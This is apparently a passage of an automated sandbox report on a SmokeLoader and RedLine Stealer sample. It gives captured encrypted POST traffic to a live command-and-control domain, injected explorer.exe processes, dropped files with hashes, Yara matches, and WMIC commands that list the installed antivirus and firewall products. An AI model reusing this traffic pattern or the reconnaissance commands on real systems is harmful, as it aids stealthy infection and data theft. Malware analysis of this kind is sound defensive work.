2024-10-07 22:21:02 UTC | 268 | OUT | Data Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 7a 34 01 83 b7 25 93 3c 51 c8 0f 9c 82 a3 13 06 be 06 6a ed 27 9a ce 30 6b cf 19 0a 24 80 b5 ec 74 cb c7 64 12 ec e8 2a b7 21 67 f9 e2 6a 21 20 1c 32 36 cc 6e d3 e9 80 0d de 8c 63 08 38 e1 6e 02 aa 35 68 99 cb a0 97 30 1b a9 68 c3 7d 89 01 4f a5 1c 93 63 5a 31 04 79 fb d9 0a a1 8d 1d 91 2d 2d c8 b3 bf 2e ed e4 7f eb ae 87 ce 34 32 a5 bf a5 41 39 95 54 08 de 71 44 19 e4 51 1d 79 b2 38 12 09 c6 cd f4 1b 60 be d9 02 eb 2c cd a7 f1 7a 0f 63 30 a6 18 0f 15 38 15 ba 5e ee 81 38 41 11 66 4b e2 e4 7e 36 14 3b 94 c8 c0 55 95 f2 19 cf 77 c5 82 aa 99 60 94 45
Data Ascii: r{O)fz<pqB )6IP g3iqH[@Lz4%<Qj'0k$td*!gj! 26nc8n5h0h}OcZ1y--.42A9TqDQy8`,zc08^8AfK~6;Uw`E
2024-10-07 22:21:02 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 22:21:02 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 50013 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 22:21:03 UTC | 289 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://kouspbvvekjqvnkd.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 239
Host: ninjahallnews.com
2024-10-07 22:21:03 UTC | 239 | OUT | Data Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 7b 34 01 83 b7 25 93 3c 47 c3 74 e1 8f fb 0b 38 c1 77 00 b9 52 8d e4 3b 72 b6 67 2e 41 b9 e0 da 7d b6 e7 58 08 f7 94 71 ad 2f 6e b3 fb 4a 3c 2e 03 09 1c c4 65 bb d6 81 1e db b7 53 7f 02 84 64 44 d3 4c 60 fa d0 f0 a4 23 26 a5 67 de 6d e1 07 58 9a 56 c7 2e 31 24 64 66 d6 c1 40 a9 98 6c d7 3b 3b 96 cc ba 08 c2 f6 0d 82 d4 93 a3 1d 6b ad cc ab 1d 05 a1 5d 50 d7 62 0f 13 f0 6e 25 44 f6 1e 76 50 e2 cc c5 7e 30 be cb 7b 9a 6d d3 c4 a2 2b 3a 24 53 ca 10 02 1f 2a 12 e6 15 e2 9f 67 0c 6d 79 0e dc b9 4e 3f 2f 67
Data Ascii: r{O)fz<pqB )6IP g3iqH[@L{4%<Gt8wR;rg.A}Xq/nJ<.eSdDL`#&gmXV.1$df@l;;k]Pbn%DvP~0{m+:$S*gmyN?/g
2024-10-07 22:21:03 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 22:21:03 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 50050 | 23.145.40.168 | 443 | 2140 | C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 22:21:11 UTC | 287 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://ninjahallnews.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 4431
Host: ninjahallnews.com
2024-10-07 22:21:11 UTC | 4431 | OUT | Data Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34 01 83 b7 25 93 3c 5d cf 27 91 a3 dd 2a 25 c6 00 16 9c 51 e5 e3 1b 09 bf 67 33 46 c9 e0 f3 49 fe fe 76 77 f7 96 5d 8f 33 2d 87 e5 6a 0e 47 60 11 1a eb 19 bb 96 8a 06 8b e6 69 22 2e 90 41 39 b6 26 46 ed f7 99 a5 69 56 b5 62 da 54 94 20 7f ae 3f 85 54 4b 4c 0b 75 ad cd 7c ad cb 1f e6 21 7a ed df ad 3a dd bf 5a 9c b9 91 a3 17 4e b1 d1 85 6a 24 b5 69 28 ed 0f 51 1e 91 2c 13 4f cb 21 37 3f 85 b8 db 25 42 8a fa 4d c6 42 99 f8 cf 13 08 0e 56 c3 1d 01 49 29 2d d7 2c 8d b5 13 36 13 26 14 e7 87 25 58 0f 3d aa ea 9e 23 d7 ce 20 e3 7a 96 a0 c8 a9 79 86 4f
Data Ascii: r{O)fz<pqBnluIP g3@ZFLj4%<]'*%Qg3FIvw]3-jG`i".A9&FiVbT ?TKLu|!z:ZNj$i(Q,O!7?%BMBVI)-,6&%X=# zyO
2024-10-07 22:21:11 UTC | 287 | IN | HTTP/1.1 404 Not Found
Date: Mon, 07 Oct 2024 22:21:11 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 409
Content-Type: text/html; charset=utf-8
Connection: close
2024-10-07 22:21:11 UTC | 409 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 50063 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 22:22:27 UTC | 287 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://giugthslvfwuci.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 109
Host: ninjahallnews.com
2024-10-07 22:22:27 UTC | 109 | OUT | Data Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
Data Ascii: r{O)fz<pqB )6IP g3iqH[CLk4%<2eQvb%;=j ,
2024-10-07 22:22:27 UTC | 285 | IN | HTTP/1.1 404 Not Found
Date: Mon, 07 Oct 2024 22:22:27 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 7
Content-Type: text/html; charset=utf-8
Connection: close
2024-10-07 22:22:27 UTC | 7 | IN | Data Raw: 03 00 00 00 1e 0d af
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 50065 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 22:22:49 UTC | 285 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://dcegxttxxlsj.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 109
Host: ninjahallnews.com
2024-10-07 22:22:49 UTC | 109 | OUT | Data Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
Data Ascii: r{O)fz<pqB )6IP g3iqH[CLk4%<2eQvb%;=j ,
2024-10-07 22:22:50 UTC | 285 | IN | HTTP/1.1 404 Not Found
Date: Mon, 07 Oct 2024 22:22:49 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 7
Content-Type: text/html; charset=utf-8
Connection: close
2024-10-07 22:22:50 UTC | 7 | IN | Data Raw: 03 00 00 00 1e 0d af
Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      24192.168.2.45006723.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:23:14 UTC284OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://mqhltxselyb.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 109
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:23:14 UTC109OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                      2024-10-07 22:23:14 UTC285INHTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 07 Oct 2024 22:23:14 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 7
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      2024-10-07 22:23:14 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                      Data Ascii:


                                                                                                      Target ID:0
                                                                                                      Start time:18:19:28
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Users\user\Desktop\bCnarg2O62.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\bCnarg2O62.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:453'632 bytes
                                                                                                      MD5 hash:FA949A7589DC71EA006EB10AD025618A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1799052498.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1799134235.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1799134235.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1799360788.00000000005AD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1799202066.0000000000561000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1799202066.0000000000561000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:1
                                                                                                      Start time:18:19:34
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                      Imagebase:0x7ff72b770000
                                                                                                      File size:5'141'208 bytes
                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:5
                                                                                                      Start time:18:19:54
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\derhswe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\derhswe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:453'632 bytes
                                                                                                      MD5 hash:FA949A7589DC71EA006EB10AD025618A
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2045303884.000000000050C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2045484809.0000000001FE1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2045484809.0000000001FE1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2045012210.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2045088261.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2045088261.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      • Detection: 39%, ReversingLabs
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:6
                                                                                                      Start time:18:20:01
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\derhswe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\derhswe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:453'632 bytes
                                                                                                      MD5 hash:FA949A7589DC71EA006EB10AD025618A
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2106411331.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2106596720.000000000073F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2106729164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2106729164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2106441385.0000000000530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2106441385.0000000000530000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:7
                                                                                                      Start time:18:20:16
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1D0F.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\1D0F.exe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:453'632 bytes
                                                                                                      MD5 hash:02F50094664F74B387AC57B1DE8679AF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2264170490.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2264170490.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2263700057.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2264057033.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:8
                                                                                                      Start time:18:20:40
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\jfrhswe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\jfrhswe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:453'632 bytes
                                                                                                      MD5 hash:02F50094664F74B387AC57B1DE8679AF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2520233894.000000000073D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2520412148.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2520412148.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.2519523064.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2520072402.0000000000710000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2520072402.0000000000710000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:10
                                                                                                      Start time:18:20:59
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\9245.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\9245.exe
                                                                                                      Imagebase:0x7ff7327a0000
                                                                                                      File size:78'336 bytes
                                                                                                      MD5 hash:65AEAA0A0849CB3CE9BC15BCBF0B7B9F
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      Target ID:11
                                                                                                      Start time:18:21:00
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                      Imagebase:0x7ff778820000
                                                                                                      File size:69'632 bytes
                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:12
Start time:18:21:02
Start date:07/10/2024
Path:C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\explorer.exe
Imagebase:0x890000
File size:4'514'184 bytes
MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:13
Start time:18:21:03
Start date:07/10/2024
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\explorer.exe
Imagebase:0x7ff72b770000
File size:5'141'208 bytes
MD5 hash:662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:14
Start time:18:21:04
Start date:07/10/2024
Path:C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\explorer.exe
Imagebase:0x890000
File size:4'514'184 bytes
MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:moderate
Has exited:false

Target ID:15
Start time:18:21:04
Start date:07/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd
Imagebase:0x7ff793540000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:16
Start time:18:21:04
Start date:07/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff735400000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:17
Start time:18:21:05
Start date:07/10/2024
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\explorer.exe
Imagebase:0x7ff72b770000
File size:5'141'208 bytes
MD5 hash:662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000011.00000002.4174299297.0000000000821000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:false

Target ID:18
Start time:18:21:05
Start date:07/10/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Imagebase:0x7ff725b70000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:19
Start time:18:21:06
Start date:07/10/2024
Path:C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\explorer.exe
Imagebase:0x890000
File size:4'514'184 bytes
MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:20
Start time:18:21:07
Start date:07/10/2024
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\explorer.exe
Imagebase:0x7ff72b770000
File size:5'141'208 bytes
MD5 hash:662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:21
Start time:18:21:08
Start date:07/10/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Imagebase:0x7ff725b70000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:18:21:10
Start date:07/10/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Imagebase:0x7ff725b70000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:18:21:12
Start date:07/10/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Imagebase:0x7ff725b70000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:18:21:14
Start date:07/10/2024
Path:C:\Windows\System32\wbem\WMIC.exe
